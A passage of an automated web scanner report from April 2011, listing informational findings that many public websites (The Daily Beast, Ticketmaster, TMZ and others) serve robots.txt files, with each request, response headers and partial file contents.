Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theatlantic.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 13:45:48 GMT
Content-Type: text/plain
Content-Length: 771
Last-Modified: Tue, 07 Dec 2010 16:50:46 GMT
Connection: close
Vary: Accept-Encoding
Expires: Mon, 02 May 2011 13:45:48 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

User-agent: *
Disallow: /james-fallows/*/*
Disallow: /james-fallows/*/?cid=*
Disallow: /megan-mcardle/*/*
Disallow: /derek-thompson/*/*
Disallow: /marc-ambinder/*/*
Disallow: /ta-nehisi-coates/*/*
Dis
...[SNIP]...

24.810. http://www.thedailybeast.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thedailybeast.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 16 Mar 2011 22:57:59 GMT
ETag: "dc48f1-85-79e7cbc0"
Accept-Ranges: bytes
Content-Length: 133
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:40:10 GMT
Connection: close

User-agent: *

Disallow: /templates/wap/
Disallow: /partnersfeed/
Disallow:


Sitemap: http://www.thedailybeast.com/sitemap.xml.gz


24.811. http://www.thedailyshow.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thedailyshow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thedailyshow.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Length: 121
Content-Type: text/plain
Cache-Control: max-age=6653
Expires: Sat, 02 Apr 2011 15:22:41 GMT
Date: Sat, 02 Apr 2011 13:31:48 GMT
Connection: close

User-agent: *
Disallow: /dailyshow/
Disallow: /videos/tag/Barack+Obama1*
Sitemap: http://www.thedailyshow.com/sitemap.xml

24.812. http://www.thedietsolutionprogram.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thedietsolutionprogram.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thedietsolutionprogram.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:34:43 GMT
Accept-Ranges: bytes
ETag: "0e93d81e09fcb1:0"
Connection: close
Last-Modified: Mon, 20 Dec 2010 00:54:50 GMT
X-Powered-By: ASP.NET
Content-Length: 356

User-Agent: *
Disallow: /TSAudioDLs.aspx
Disallow: /dlpage.aspx
Disallow: /DLSection
Disallow: /reports
Disallow: /Customers
Disallow: /Order-tr.aspx
Disallow: /DSPAdmin
Disallow: /Customers

...[SNIP]...

24.813. http://www.theepochtimes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theepochtimes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theepochtimes.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Thu, 15 Jul 2010 20:11:24 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
Content-Length: 24
Date: Sat, 02 Apr 2011 14:05:24 GMT
X-Varnish: 191880444
Age: 0
Via: 1.1 varnish
Connection: close

User-agent: *
Allow: /


24.814. http://www.thefind.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefind.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thefind.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:09 GMT
Server: Apache
Set-Cookie: flsid=7b4b853f912749194c888056171905a5; path=/
Expires: Sat, 02 Apr 2011 12:53:09 GMT
Cache-Control: public, s-maxage=600, max-age=600
Last-Modified: Thu, 31 Mar 2011 05:45:53 GMT
Set-Cookie: fl-uid=0b324997204face52f7fafc99c56b03a%2C1%2C1301748189; expires=Sun, 01-Apr-2012 12:43:09 GMT; path=/; domain=.thefind.com
Content-Language: en
Status: 200 OK
Content-Length: 151
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /buyit.php
Disallow: /buy-*
Disallow: /query.php
Disallow: /main/query.php
Disallow: /search
Disallow: /cluster
Disallow: /*?


24.815. http://www.thefreedictionary.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefreedictionary.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thefreedictionary.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Language: en
Server: Microsoft-IIS/7.5
P3P: CP="CAO PSA OUR"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)), (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (v 0 s 0 n 0 l 0)), (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (l 0 s 0 v 0 o 0))
Date: Sat, 02 Apr 2011 13:27:09 GMT
Connection: close
Content-Length: 910


User-agent: Mediapartners-Google*
Disallow:

User-agent: NPBot
Disallow: /

User-agent: msrbot
Disallow: /

User-Agent: Open*
Disallow: /

User-Agent: Twiceler
Disallow: /

User-Agent
...[SNIP]...

24.816. http://www.thefreelibrary.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefreelibrary.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thefreelibrary.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: track=2; domain=.thefreelibrary.com; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:39:57 GMT
Connection: close
Content-Length: 695

User-agent: NPBot
Disallow: /

User-Agent: Open*
Disallow: /

User-Agent: Twiceler
Disallow: /

User-Agent: Scooter*
Disallow: /

User-Agent: WebSearch*
Disallow: /

User-Agent: ZyBorg*
...[SNIP]...

24.817. http://www.thefrisky.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefrisky.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thefrisky.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 04 Jun 2010 16:11:09 GMT
ETag: "32b403-40e1-48836922ee140"
Content-Type: text/plain
Cache-Control: max-age=153437
Date: Sat, 02 Apr 2011 13:33:13 GMT
Content-Length: 16609
Connection: close
Vary: Accept-Encoding

Sitemap: http://www.thefrisky.com/gsitemap
Sitemap: http://www.thefrisky.com/feed/sitemap/celebs/
Sitemap: http://www.thefrisky.com/feed/sitemap/entertainment/
Sitemap: http://www.thefrisky.com/feed/s
...[SNIP]...

24.818. http://www.theglobeandmail.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theglobeandmail.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theglobeandmail.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Ubuntu) Resin/3.1.8
Last-Modified: Mon, 07 Mar 2011 23:10:42 GMT
ETag: "67-49dec9acfe080"
Vary: Accept-Encoding
P3P: policyref="http://www.theglobeandmail.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI COM NAV INT DEM STA PRE"
X-ServerName: Web4
Content-Type: text/plain
Content-Length: 103
Date: Sat, 02 Apr 2011 13:56:23 GMT
X-Varnish: 744761752 744384336
Age: 2756
Via: 1.1 varnish
Connection: close
Set-Cookie: BIGipServerEceweb=402840586.20736.0000; path=/

#User-agent: *
#Disallow: /sports/soccer/worldcup2010newsfeed/
#Disallow: /news/world/g8-g20/newsfeed/

24.819. http://www.theonion.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theonion.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theonion.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:15 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n33 ( iad-agg-n5), ht iad-agg-n5.panthercdn.com
ETag: "126e2-76-482a769dbbb80"
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 02:31:43 GMT
Age: 40112
Content-Length: 118
Content-Type: text/plain
Last-Modified: Thu, 25 Mar 2010 22:17:34 GMT
Connection: close

User-Agent: *
Allow: /
Sitemap: http://www.theonion.com/sitemap.xml
Sitemap: http://www.theonion.com/sitemap_news.xml

24.820. http://www.thesaurus.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thesaurus.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thesaurus.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:48 GMT
Server: Apache
Content-Type: text/plain;charset=UTF-8
Content-Length: 598
Connection: close

User-agent: Googlebot
Disallow:

User-agent: googlebot-image
Disallow:

User-agent: googlebot-mobile
Disallow:

User-agent: MSNBot
Disallow:

User-agent: Slurp
Disallow:

User-agen
...[SNIP]...

24.821. http://www.thirdage.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thirdage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thirdage.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Varnish: 635032732
Vary: Accept-Encoding
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:40:56 GMT
X-Varnish-Cache: MISS
Web-Head: web09.advomatic.com
Via: 1.1 varnish
Connection: close
Last-Modified: Fri, 25 Mar 2011 21:07:02 GMT
Age: 0
Content-Length: 1891

# $Id: robots.txt,v 1.7.2.3 2008/12/10 20:24:38 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...

24.822. http://www.thisis50.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thisis50.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thisis50.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:21 GMT
Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=fe902e8a-e1f8-4147-aa6e-9f38dc5bad29;Path=/;Domain=.thisis50.com;Expires=Tue, 30-Mar-21 14:10:21 GMT
Set-Cookie: ning_session=QJDMeP1uBcWdCHu2Em3vKzvdHgeSpdB5Y4fXQoACNrQLzlC60RygV5LuU8EhW70VsupRYa4awCw=;Path=/;Domain=.thisis50.com;Expires=Sat, 02-Apr-11 15:10:21 GMT
X-XN-Trace-Token: f297dc60-6e04-4939-a19a-aba7b83e628b
Date: Sat, 02 Apr 2011 13:44:36 GMT
Date: Sat, 02 Apr 2011 13:44:36 GMT
P3P: CP="UNI STA LOC CURa OURa COR ALL IND"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:44:36 UTC
CACHE-CONTROL: max-age=0
CACHE-CONTROL: no-cache="Set-Cookie"
Content-Type: text/plain
Server: Ning HTTP Server 2.0
Content-Length: 184
Connection: close

User-agent: *
Disallow: /xn/ningbar.php/
Disallow: /xn/atom/
Disallow: /xn/rest/
Disallow: /xn/css/
Disallow: /xn/loader/
Disallow: /main/search/search/
Disallow: /main/authorization/

24.823. http://www.thisoldhouse.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thisoldhouse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thisoldhouse.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:08 GMT
Server: Apache
Last-Modified: Mon, 25 Feb 2008 23:18:00 GMT
ETag: "267-c86e7a00"
Accept-Ranges: bytes
Content-Length: 615
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

# Welcome to Pathfinder's robots.txt
#
# If you have any questions about indexing our site,
# especially regarding more efficient or convenient
# methods, please write to:
#
#
...[SNIP]...

24.824. http://www.thomasnet.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thomasnet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thomasnet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:01 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7a PHP/5.2.14
Last-Modified: Thu, 24 Jun 2010 13:51:35 GMT
ETag: "3645f6-7be-f3e147c0"
Accept-Ranges: bytes
Content-Length: 1982
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /404.html
Disallow: /adlink.html
Disallow: /advsearch.html
Disallow: /browse.html
Disallow: /browsecatalogcats.html
Disallow: /businessweek.html
Disallow: /cadcb.html
Disallow:
...[SNIP]...

24.825. http://www.thriftyfun.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thriftyfun.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thriftyfun.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:04 GMT
Server: Apache
Last-Modified: Mon, 19 Mar 2007 18:35:36 GMT
ETag: "359-42c0bdaebee00"
Accept-Ranges: bytes
Content-Length: 857
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 13:40:04 GMT
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
X-Debug: thrifty
Connection: close
Content-Type: text/plain

# robots.txt
#
# For more info in this file take a look at
# http://info.webcrawler.com/mak/projects/robots/norobots.html
# http://www.kollar.com/robots.html
#
User-agent: *
Disallow: /logs/
Disallow:
...[SNIP]...

24.826. http://www.ticketmaster.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketmaster.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ticketmaster.com

Response

HTTP/1.0 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
Last-Modified: Mon, 14 Mar 2011 17:32:52 GMT
ETag: "646-b383d900"
Accept-Ranges: bytes
Content-Length: 1606
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:24:53 GMT
Connection: close
Set-Cookie: SID=rlh4YCoxj0U_O4ISF3i1y9JvbOTX8T2XK8T8oEEMbH9ON5iRw1w4YNAPcO3TraAhwbpWYfY8HXNSsJUl; path=/; domain=.ticketmaster.com
Set-Cookie: BID=TkLyo5K0tLLLt_lIMIZAGi4zaH9Y8HBLySNrKXhBjePRLrVgFOYNCpUYiuS_T-uDHpVj9XC45W6lyKuLQCox; path=/; domain=.ticketmaster.com; expires=Fri, 01-Jan-2038 00:00:01 GMT
Set-Cookie: CMPS=SURtPQog9ZpYFZWwrTZmQ1zsWmM4s1z9tP8PaCxC9HGVKmn20GsIkg==; path=/

User-agent: *
Disallow: /seatingchart
Disallow: /change_area
Disallow: /find_area
Disallow: /error
Disallow: /cgi/outsider.plx
Disallow: /cgi/sfxoutsider.plx
Disallow: /cgi/tt.plx
Disallow: /healthche
...[SNIP]...

24.827. http://www.tickets.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tickets.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tickets.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 11:53:24 GMT
Server: Apache
Last-Modified: Thu, 04 Nov 2010 23:25:07 GMT
ETag: "ae9ef-68a-4cd340d3"
Accept-Ranges: bytes
Content-Length: 1674
Content-Type: text/plain
Age: 8528
X-Cache: HIT from lxweb8.back.tickets.com
Connection: close

User-agent: *
Disallow: /

User-agent: Googlebot
Disallow: /demo/
Disallow: /scripts/
Disallow: /styles/

User-agent: Googlebot-Image
Disallow: /

User-agent: bingbot
Disallow: /demo/
Disallow: /scrip
...[SNIP]...

24.828. http://www.ticketsnow.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketsnow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ticketsnow.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 1284
Content-Type: text/plain; charset=utf-8
Last-Modified: Sat, 02 Apr 2011 14:02:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR CUR PSA OUR IND INT"
X-Powered-By: ASP.NET
Set-Cookie: TNOW3SessionCookie=976320910#a08f46cc-9c82-4e39-8027-a4e44688354d; expires=Mon, 02-Apr-2012 14:02:54 GMT; path=/
X-Header-Removed-1: ETag
Date: Sat, 02 Apr 2011 14:02:54 GMT
Connection: keep-alive


# This robots.txt is generated by Robots.aspx.
User-agent: *
Disallow: /SellYourTicketsNow/
Disallow: /search/
Disallow: /test/
Disallow: /order/
Disallow: /secureorder/
Disallow: /check
...[SNIP]...

24.829. http://www.tigerdirect.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tigerdirect.com

Response

HTTP/1.0 200 OK
Content-Length: 112
Content-Type: text/plain
Last-Modified: Fri, 24 Jul 2009 20:02:38 GMT
Accept-Ranges: bytes
ETag: "a3c6d8b199cca1:103ea"
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:37:17 GMT
Connection: close

# Allow all

User-agent: *
Disallow: /cgi-bin/
Disallow: /cgisec/
Disallow: /profiles/
Disallow: /email/

24.830. http://www.time.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.time.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.time.com

Response

HTTP/1.1 200 OK
Server: Undisclosed-Webserver/0.1
Date: Sat, 02 Apr 2011 13:24:06 GMT
Content-type: text/plain
Set-Cookie: PFUID=40ec37ca4d97237660041001ffffff9d; path=/; domain=.time.com; expires=Tue, 01-Jan-2035 00:00:00 GMT
Last-modified: Wed, 19 Aug 2009 14:07:44 GMT
Content-length: 1738
Accept-ranges: bytes
Connection: close

# Welcome to Pathfinder's robots.txt
#
# If you have any questions about indexing our site,
# especially regarding more efficient or convenient
# methods, please write to:
#
#
...[SNIP]...

24.831. http://www.timeanddate.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timeanddate.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.timeanddate.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:59 GMT
Server: Apache/2.2.17
Last-Modified: Thu, 09 Dec 2010 08:58:26 GMT
ETag: "2db191e-1b48-496f670d57080"
Accept-Ranges: bytes
Content-Length: 6984
Content-Type: text/plain
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

# http://web.nexor.co.uk/mak/doc/robots/norobots.html
#

User-agent: MSIECrawler
Disallow: /

User-agent: PortalBSpider
Disallow: /

User-agent: Mediapartners-Google*
Disallow:

User-agent: ScoutJet

...[SNIP]...

24.832. http://www.timewarnercable.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timewarnercable.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.timewarnercable.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Length: 208
Content-Type: text/plain
Last-Modified: Thu, 16 Dec 2010 04:24:24 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:03:55 GMT
Connection: close

# /robots.txt file for http://www.timewarnercable.com/

User-agent: *
Disallow: /model/
Disallow: /carolinasmodel/
Disallow: /sandiegomodel/
Disallow: /test/
Disallow: /Test/
Disallow: /util/
Disallow
...[SNIP]...

24.833. http://www.tinypic.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tinypic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tinypic.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:37:28 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 23 Sep 2008 15:59:12 GMT
ETag: "4d-3fad3400"
Accept-Ranges: bytes
Content-Length: 77
Age: 1157
X-Cache: HIT from tinypic.com
Via: 1.0 den2tpsq04:80 (squid)

User-agent: *
Disallow: /language.php
Disallow: /track.php
Disallow: /ad.php

24.834. http://www.tmz.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tmz.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 12:43:29 GMT
Server: Apache
Set-Cookie: phpsessionid=fltn4m5v67qnf7k87jdps94fp7; expires=Mon, 04-Apr-2011 12:43:29 GMT; path=/; domain=www.tmz.com
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 02 Apr 2011 12:43:29 GMT
Vary: Accept-Encoding
Content-Length: 1000
Connection: close
Content-Type: text/plain; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private


User-agent: *
Disallow: /*?action=print
Disallow: */third_rail_rework
Disallow: */digitalsmiths_demo_environment
Disallow: */video_demo
Disallow: */tmz_dev_demo
Disallow: */test_page
Disallow: */test
...[SNIP]...

24.835. http://www.tomshardware.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tomshardware.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tomshardware.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:39:00 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 13:57:11 GMT
ETag: "569357-71a-49fc7ab793bc0"
Accept-Ranges: bytes
Content-Length: 1818
Vary: Accept-Encoding
Content-Type: text/plain
X-Cache: MISS from proxy-us1.bsocom.net
Via: 1.0 proxy-us1.bsocom.net:80 (squid/2.6.STABLE16)
Connection: close

#presence-pc
Sitemap: http://www.presence-pc.com/forum/sitemap-index.php?config=presencepc.inc&num=10000

#tomshardware

Sitemap: http://www.tomshardware.com/forum/sitemap-index.php?config=tomshardwar
...[SNIP]...

24.836. http://www.topix.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.topix.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.topix.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:24:19 GMT
Server: Apache
P3P: policyref="http://topix.cachefly.net/static/p3p.xml", CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND ONLo UNI COM NAV INT DEM STA"
X-TALXX: 2.88
Cache-Control: private, max-age=31536000
Last-Modified: Fri, 27 Oct 2006 12:00:00 GMT
Expires: Sun, 01 Apr 2012 13:24:19 GMT
ETag: "robots.1.txt"
Content-Length: 2465
Connection: close
Content-Type: text/plain
X-TPBI: 23350 003106192168 0.0050 0.0051

# Topix Robots.txt
# SYSTEM OK
User-agent: *
Disallow: /search/
Disallow: /redir/
Disallow: /r/
Disallow: /feedback/
Disallow: /iframe/
Disallow: /bin/
Disallow: /t6track/
Disallow: /pics/
Disallow: /
...[SNIP]...

24.837. http://www.topix.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.topix.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.topix.net

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:46:07 GMT
Server: Apache
P3P: policyref="http://topix.cachefly.net/static/p3p.xml", CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND ONLo UNI COM NAV INT DEM STA"
X-TALXX: 4.09
Cache-Control: private, max-age=31536000
Last-Modified: Fri, 27 Oct 2006 12:00:00 GMT
Expires: Sun, 01 Apr 2012 13:46:07 GMT
ETag: "robots.1.txt"
Content-Length: 2465
Connection: close
Content-Type: text/plain
X-TPBI: 23350 003182192168 0.0127 0.0128

# Topix Robots.txt
# SYSTEM OK
User-agent: *
Disallow: /search/
Disallow: /redir/
Disallow: /r/
Disallow: /feedback/
Disallow: /iframe/
Disallow: /bin/
Disallow: /t6track/
Disallow: /pics/
Disallow: /
...[SNIP]...

24.838. http://www.topshareware.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.topshareware.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.topshareware.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 01 Dec 2009 11:14:54 GMT
Accept-Ranges: bytes
ETag: "4a163827772ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:53:17 GMT
Connection: close
Content-Length: 1786

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /redirect.aspx
Disallow: /downloads.aspx
Disallow: /download.aspx
Disallow: /buy.aspx
Disallow: /search.aspx
Disallow: /*?
...[SNIP]...

24.839. http://www.toptenreviews.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toptenreviews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.toptenreviews.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:39 GMT
Server: Apache
Last-Modified: Tue, 10 Nov 2009 15:15:58 GMT
ETag: "6a4a0e-19-47805c985c780"
Accept-Ranges: bytes
Content-Length: 25
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8


User-Agent: *
Allow: /

24.840. http://www.totalbeauty.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalbeauty.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.totalbeauty.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 05:19:58 GMT
Last-Modified: Tue, 22 Mar 2011 01:23:28 GMT
Accept-Ranges: bytes
Content-Length: 121
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
_onnection: keep-alive
Via: CN-5000
Set-Cookie: cresist=43C93BCA00001F90; path=/
Connection: close

User-agent: *
Disallow: /typo3conf/
Disallow: /typo3_src-4.1.1/
Disallow: /fileadmin/
Disallow: /t3lib/
Disallow: /func/

24.841. http://www.townhall.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.townhall.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.townhall.com

